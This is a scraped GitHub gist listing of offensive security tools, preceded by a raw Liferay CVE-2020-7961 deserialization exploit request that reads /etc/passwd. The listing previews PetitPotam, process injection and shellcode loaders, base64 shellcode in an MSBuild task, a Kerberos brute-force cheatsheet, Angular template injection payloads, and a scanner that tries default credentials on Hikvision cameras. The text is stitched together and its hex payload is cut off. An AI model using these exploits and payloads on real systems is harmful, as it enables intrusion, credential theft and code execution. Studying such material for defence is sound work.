POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close
cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
ashr ashr
ashr
/ PetitPotam.py
Created
August 12, 2021 16:08
— forked from micahvandeusen/PetitPotam.py
PetitPotam.py modified to use EfsRpcDecryptFileSrv not EfsRpcOpenFileRaw
View PetitPotam.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # Author: GILLES Lionel aka topotam (@topotam77) | |
| # Modified by: Micah Van Deusen (@micahvandeusen) | |
| # Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs) | |
| # "Most of" the code stolen from dementor.py from @3xocyte ;) | |
| import sys | |
| import argparse |
ashr
/ LiferayRCE(CVE-2020-7961).md
Created
February 5, 2021 06:15
— forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961)
View LiferayRCE(CVE-2020-7961).md
ashr
/ Program.cs
Created
January 25, 2021 14:33
Generate a CSV containing ParentObject and SPN name from BloodHound export of GetAllSPNS Query
View Program.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Linq; | |
| using Newtonsoft.Json; | |
| using Newtonsoft.Json.Linq; | |
| namespace spns | |
| { | |
| class Program | |
| { |
ashr
/ CreateRemoteThreadDInvoke.cs
Created
October 8, 2020 13:34
— forked from Flangvik/CreateRemoteThreadDInvoke.cs
View CreateRemoteThreadDInvoke.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace InjectionTest | |
| { | |
| public class DELEGATES | |
| { |
ashr
/ kerberos_attacks_cheatsheet.md
Created
May 11, 2020 09:08
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md
Kerberos cheatsheet
Bruteforcing
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
ashr
/ EtwpTest.cs
Created
May 8, 2020 08:40
— forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
View EtwpTest.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace EtwpTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
ashr
/ _Instructions_Reproduce.md
Created
April 29, 2020 10:54
GhostLoader - AppDomainManager - Injection - 攻壳机动队
View _Instructions_Reproduce.md
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
ashr
/ AngularTI.md
Created
April 20, 2020 12:42
— forked from mccabe615/AngularTI.md
Angular Template Injection Payloads
View AngularTI.md
1.3.2 and below
{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
ashr
/ hikvision-scrape.sh
Created
February 12, 2020 04:17
— forked from smidgedy/hikvision-scrape.sh
This abomination pulls Hikvision NVR/DVR systems out of masscan output JSON, checks them for default creds, and dumps still images from any system it can access to aid identification. Runs faster if you have GNU Parallel. This is what happens when you start a project as a bash one-liner because opening vscode is too much effort.
View hikvision-scrape.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Masscan - common ports are 80, 81, 8000, 8080, 8081, 8090, 8888, 9000, 9001 | |
| # I do it like this: | |
| # sudo masscan --banners --source-ip <IP not in use on your network> --rate <how fast you can scan>\ | |
| # -iL <list of CIDR to scan> -p <that list of ports above> -oJ <output file.json> | |
| # Output filenames | |
| HIKVISION_LIST_DEFAULT='hikvision-default.txt' | |
| HIKVISION_LIST_NON_DEFAULT='hikvision-nondefault.txt' |
ashr
/ AllIdoIsWin.cs
Created
January 15, 2020 09:24
Stolen from twitter, think it was posted by Casey Smith (@subTee)
View AllIdoIsWin.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="MyTarget"> | |
| <SimpleTask MyProperty="My voice is my passport." | |
| MyCode="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA" | |
| MyProcess="C:\Windows\notepad.exe"/> | |
| </Target> | |
| <UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" /> | |
| </Project> | |
| */ |
NewerOlder